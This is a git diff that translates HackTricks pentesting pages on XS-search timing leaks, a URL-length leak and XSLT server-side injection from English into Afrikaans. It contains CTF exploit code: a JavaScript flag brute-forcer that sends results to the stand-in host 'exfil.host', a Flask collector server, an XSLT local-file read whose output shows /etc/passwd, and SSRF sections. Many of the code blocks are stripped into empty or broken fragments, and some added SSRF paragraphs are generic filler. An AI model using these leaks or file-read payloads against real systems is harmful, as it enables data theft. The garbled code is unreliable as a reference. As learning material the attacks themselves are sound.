+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
index b6724a16e..3587f2435 100644
--- a/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
+++ b/pentesting-web/xs-search/performance.now-+-force-heavy-task.md
@@ -1,25 +1,24 @@
-# performance.now + Force heavy task
+# performance.now + Kragtige taak afdwing
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
-**Exploit taken from [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
+**Exploit geneem van [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
 
-In this challenge the user could sent thousands of chars and if the flag was contained, the chars would be sent back to the bot. So putting a big amount of chars the attacker could measure if the flag was containing in the sent string or not.
+In hierdie uitdaging kon die gebruiker duisende karakters stuur en as die vlag bevat was, sou die karakters teruggestuur word na die bot. Deur 'n groot hoeveelheid karakters te stuur, kon die aanvaller meet of die vlag in die gestuurde string voorkom of nie.
 
 {% hint style="warning" %}
-Initially, I didn’t set object width and height, but later on, I found that it’s important because the default size is too small to make a difference in the load time.
+Aanvanklik het ek nie die objekbreedte en -hoogte ingestel nie, maar later het ek gevind dat dit belangrik is omdat die verstekgrootte te klein is om 'n verskil in die laai-tyd te maak.
 {% endhint %}
-
 ```html
 
 
@@ -27,105 +26,102 @@ Initially, I didn’t set object width and height, but later on, I found that it
 
 
 
-  
-    
+if (notFound > found) {
+return
+}
+
+// exploit
+while(true) {
+if (flag[flag.length - 1] === '}') {
+break
+}
+for(let char of charset) {
+let trying = flag + char
+let time = 0
+for(let i=0; i<3; i++) {
+time += await leak(trying)
+}
+time/=3
+send('char:'+trying+',time:'+time)
+if (time >= threshold) {
+flag += char
+send(flag)
+break
+}
+}
+}
+}
+
+main()
+
+
 
 
 
 ```
-
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xs-search/performance.now-example.md b/pentesting-web/xs-search/performance.now-example.md
index dd7348880..3eb067b48 100644
--- a/pentesting-web/xs-search/performance.now-example.md
+++ b/pentesting-web/xs-search/performance.now-example.md
@@ -1,69 +1,67 @@
-# performance.now example
+# Voorbeeld van performance.now
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
-**Example taken from [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
-
+**Voorbeeld geneem vanaf [https://ctf.zeyu2001.com/2022/nitectf-2022/js-api](https://ctf.zeyu2001.com/2022/nitectf-2022/js-api)**
 ```javascript
 const sleep = (ms) => new Promise((res) => setTimeout(res, ms));
 
 async function check(flag) {
-    let w = frame.contentWindow;
-    w.postMessage({'op': 'preview', 'payload': ''}, '*');
-    await sleep(1);
-    w.postMessage({'op': 'search', 'payload': flag}, '*');
-    let t1 = performance.now();
-    await sleep(1);
-    return (performance.now() - t1) > 200;
+let w = frame.contentWindow;
+w.postMessage({'op': 'preview', 'payload': ''}, '*');
+await sleep(1);
+w.postMessage({'op': 'search', 'payload': flag}, '*');
+let t1 = performance.now();
+await sleep(1);
+return (performance.now() - t1) > 200;
 }
 
 async function main() {
-    let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}';
-    window.frame = document.createElement('iframe');
-    frame.width = '100%';
-    frame.height = '700px';
-    frame.src = 'https://challenge.jsapi.tech/';
-    document.body.appendChild(frame);
-    await sleep(1000);
+let alpha = 'abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ-}';
+window.frame = document.createElement('iframe');
+frame.width = '100%';
+frame.height = '700px';
+frame.src = 'https://challenge.jsapi.tech/';
+document.body.appendChild(frame);
+await sleep(1000);
 
-    let flag = 'nite{';
-    while(1) {
-        for(let c of alpha) {
-            let result = await Promise.race([
-                check(flag + c),
-                new Promise((res) => setTimeout(() => { res(true); }, 300))
-            ]);
-            console.log(flag + c, result);
-            if(result) {
-                flag += c;
-                break;
-            }
-        }
-        new Image().src = '//exfil.host/log?' + encodeURIComponent(flag);
-    }
+let flag = 'nite{';
+while(1) {
+for(let c of alpha) {
+let result = await Promise.race([
+check(flag + c),
+new Promise((res) => setTimeout(() => { res(true); }, 300))
+]);
+console.log(flag + c, result);
+if(result) {
+flag += c;
+break;
+}
+}
+new Image().src = '//exfil.host/log?' + encodeURIComponent(flag);
+}
 }
 
 document.addEventListener('DOMContentLoaded', main);
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xs-search/url-max-length-client-side.md b/pentesting-web/xs-search/url-max-length-client-side.md
index 0b5365bd9..fc1ead0c1 100644
--- a/pentesting-web/xs-search/url-max-length-client-side.md
+++ b/pentesting-web/xs-search/url-max-length-client-side.md
@@ -1,57 +1,54 @@
-# URL Max Length - Client Side
+# URL Maksimum Lengte - Kliëntkant
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

 
-Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
-
+Kode vanaf [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)
 ```html
 
 
 
 
 ```
-
-Server side:
-
+Bedienerkant:
 ```python
 from flask import Flask, request
 
@@ -62,34 +59,33 @@ chars = []
 
 @app.route('/', methods=['GET'])
 def index():
-    global chars
-    
-    nope = request.args.get('nope', '')
-    if nope:
-        chars.append(nope)
+global chars
 
-    remaining = [c for c in CHARSET if c not in chars]
+nope = request.args.get('nope', '')
+if nope:
+chars.append(nope)
 
-    print("Remaining: {}".format(remaining))
+remaining = [c for c in CHARSET if c not in chars]
 
-    return "OK"
+print("Remaining: {}".format(remaining))
+
+return "OK"
 
 @app.route('/exploit.html', methods=['GET'])
 def exploit():
-    return open('exploit.html', 'r').read()
+return open('exploit.html', 'r').read()
 
 if __name__ == '__main__':
-    app.run(host='0.0.0.0', port=1337)
+app.run(host='0.0.0.0', port=1337)
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**hacktricks-repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud-repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 

diff --git a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
index 8474e4480..cce971e79 100644
--- a/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
+++ b/pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md
@@ -1,145 +1,137 @@
-# XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
+# XSLT-bedienerkant-inspuiting (Uitbreibare Stylbladtaal Transformasies)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-XSLT is a technology employed for transforming XML documents into different formats. It comes in three versions: 1, 2, and 3, with version 1 being the most commonly utilized. The transformation process can be executed either on the server or within the browser.
+XSLT is 'n tegnologie wat gebruik word om XML-dokumente na verskillende formate te transformeer. Dit kom in drie weergawes voor: 1, 2 en 3, waarvan weergawe 1 die mees algemeen gebruik word. Die transformasieproses kan óf op die bediener óf binne die blaaier uitgevoer word.
 
-The frameworks that are most frequently used include:
+Die raamwerke wat die meeste gebruik word, sluit in:
 
-- **Libxslt** from Gnome,
-- **Xalan** from Apache,
-- **Saxon** from Saxonica.
+- **Libxslt** van Gnome,
+- **Xalan** van Apache,
+- **Saxon** van Saxonica.
 
-For the exploitation of vulnerabilities associated with XSLT, it is necessary for xsl tags to be stored on the server side, followed by accessing that content. An illustration of such a vulnerability is documented in the following source: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
-
-## Example - Tutorial
+Vir die uitbuiting van kwesbaarhede wat verband hou met XSLT, is dit nodig dat xsl-etikette aan die bedienerkant gestoor word, gevolg deur toegang tot daardie inhoud. 'n Voorbeeld van so 'n kwesbaarheid word gedokumenteer in die volgende bron: [https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/](https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/).
 
+## Voorbeeld - Tutoriaal
 ```bash
 sudo apt-get install default-jdk
 sudo apt-get install libsaxonb-java libsaxon-java
 ```
-
 {% code title="xml.xml" %}
 ```xml
 
 
-    
-        CD Title
-        The artist
-        Da Company
-        10000
-        1760
-    
+
+CD Title
+The artist
+Da Company
+10000
+1760
+
 
 ```
-{% endcode %}
-
 {% code title="xsl.xsl" %}
 ```xml
 
 
 
-    
-    
-    
The Super title

-    
-        
-            
-            
-        
-        
-        
-        
-        
-    
Titleartist

-    
-    
+
+
+
The Super title

+
+
+
+
+
+
+
+
+
+
Titleartist

+
+
 
 
 ```
 {% endcode %}
 
-Execute:
-
+Uitvoer:
 ```xml
 saxonb-xslt -xsl:xsl.xsl xml.xml
- 
+
 Warning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 
-   
-      
The Super title

-      
-         
-            
-            
-         
-         
-            
-            
-         
-      
Titleartist
CD TitleThe artist

-   
+
+
The Super title

+
+
+
+
+
+
+
+
+
+
Titleartist
CD TitleThe artist

+
 
 ```
-
-### Fingerprint
+### Vingerafdruk
 
 {% code title="detection.xsl" %}
 ```xml
 
 
 
- Version: 

- Vendor: 

- Vendor URL: 

- 
- Product Name: 

- 
- 
- Product Version: 

- 
- 
- Is Schema Aware ?: 

- 
- 
- Supports Serialization: 

+Vendor: 

+Vendor URL: 

+
+Product Name: 

+
+
+Product Version: 

+
+
+Is Schema Aware ?: 

+
+
+Supports Serialization: 

- 
- 
- Supports Backwards Compatibility: 
+
+Supports Backwards Compatibility: 

- 
+
 
 
 ```
 {% endcode %}
 
-And execute
-
+En voer uit
 ```xml
-$saxonb-xslt -xsl:detection.xsl xml.xml 
+$saxonb-xslt -xsl:detection.xsl xml.xml
 
 Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 
XSLT identification
Version:2.0
Vendor:SAXON 9.1.0.8 from Saxonica
Vendor URL:http://www.saxonica.com/

 ```
+### Lees Plaaslike Lêer
 
-### Read Local File
-
-{% code title="read.xsl" %}
+{% code title="lees.xsl" %}
 ```xml
 
 
@@ -148,12 +140,11 @@ Warning: at xsl:stylesheet on line 2 column 80 of detection.xsl:
 
 ```
 {% endcode %}
-
 ```xml
 $ saxonb-xslt -xsl:read.xsl xml.xml
 
 Warning: at xsl:stylesheet on line 1 column 111 of read.xsl:
-  Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
+Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
 bin:x:2:2:bin:/bin:/usr/sbin/nologin
@@ -163,9 +154,17 @@ games:x:5:60:games:/usr/games:/usr/sbin/nologin
 man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
 lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 ```
-
 ### SSRF
 
+Server-Side Request Forgery (SSRF) is 'n aanvalstegniek wat gebruik maak van 'n kwesbare webtoepassing om 'n aanvaller toe te laat om versoek na ander interne of eksterne hulpbronne te stuur. Hierdie aanval kan gebruik word om gevoelige inligting te ontsluit, interne stelsels te skandeer of selfs om toegang tot die interne netwerk te verkry.
+
+SSRF-aanvalle kan plaasvind as gevolg van swak verifikasie van gebruikersinsette, onvoldoende beperkings op die toegang tot hulpbronne of die gebruik van onbetroubare protokolle soos file:// of gopher://. Die aanvaller kan die webtoepassing dwing om versoek na 'n spesifieke URL te stuur, wat kan lei tot die blootstelling van gevoelige inligting of die uitvoering van verdere aanvalle.
+
+Om SSRF-aanvalle te voorkom, moet ontwikkelaars gebruikersinsette behoorlik verifieer en valideringstoetse implementeer om te verseker dat slegs geldige en veilige URL's gebruik word. Daar moet ook beperkings geplaas word op die toegang tot interne hulpbronne en die gebruik van onbetroubare protokolle moet vermy word.
+
+As 'n pentester kan jy SSRF-aanvalle identifiseer deur die toepassing te skandeer vir moontlike kwesbaarhede, soos onvoldoende verifikasie van gebruikersinsette of die gebruik van onbetroubare protokolle. Jy kan ook probeer om toegang tot interne hulpbronne te verkry deur spesifieke URL's te stuur en te kyk of die toepassing dit aanvaar en reageer.
+
+Dit is belangrik om bewus te wees van die risiko's van SSRF-aanvalle en om toepassings behoorlik te beveilig om hierdie tipe aanvalle te voorkom.
 ```xml
 
 
@@ -173,56 +172,71 @@ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
 
 
 ```
+### Weergawes
 
-### Versions
-
-There might be more or less functions depending on the XSLT version used:
+Daar kan meer of minder funksies wees, afhangende van die gebruikte XSLT-weergawe:
 
 * [https://www.w3.org/TR/xslt-10/](https://www.w3.org/TR/xslt-10/)
 * [https://www.w3.org/TR/xslt20/](https://www.w3.org/TR/xslt20/)
 * [https://www.w3.org/TR/xslt-30/](https://www.w3.org/TR/xslt-30/)
 
-## Fingerprint
-
-Upload this and take information
+## Vingerafdruk
 
+Laai dit op en neem inligting
 ```xml
 
 
 
- Version: 

- Vendor: 

- Vendor URL: 

- 
- Product Name: 

- 
- 
- Product Version: 

- 
- 
- Is Schema Aware ?: 

- 
- 
- Supports Serialization: 

+Vendor: 

+Vendor URL: 

+
+Product Name: 

+
+
+Product Version: 

+
+
+Is Schema Aware ?: 

+
+
+Supports Serialization: 

- 
- 
- Supports Backwards Compatibility: 
+
+Supports Backwards Compatibility: 

- 
+
 
 
 ```
-
 ## SSRF
 
+SSRF (Server-Side Request Forgery) is 'n aanvalstegniek wat gebruik word om 'n webbediener te mislei om afgelope aanvrae na ander interne hulpbronne te stuur. Dit kan gebruik word om gevoelige inligting te onttrek, interne netwerktoegang te verkry of selfs om aanvalle teen ander stelsels uit te voer.
+
+SSRF-aanvalle kan voorkom as 'n gevolg van swak verifikasie van gebruikersinsette, waar die aanvaller 'n URL kan insluit wat verwys na 'n interne hulpbron. Die webbediener sal dan die aanvraag na die opgegee URL stuur, sonder om te besef dat dit 'n interne hulpbron is.
+
+Om 'n SSRF-aanval uit te voer, moet die aanvaller 'n kwesbare webtoepassing vind wat die aanvraag na 'n URL stuur sonder behoorlike verifikasie. Die aanvaller kan dan 'n spesiaal ontwerpte URL insluit wat verwys na 'n interne hulpbron wat hy wil aanval.
+
+Daar is verskeie maniere waarop 'n aanvaller 'n SSRF-aanval kan uitvoer, insluitend die gebruik van protokolmanipulasie, IP-adresmanipulasie en die gebruik van interne IP-adresse of privaat netwerkadressering.
+
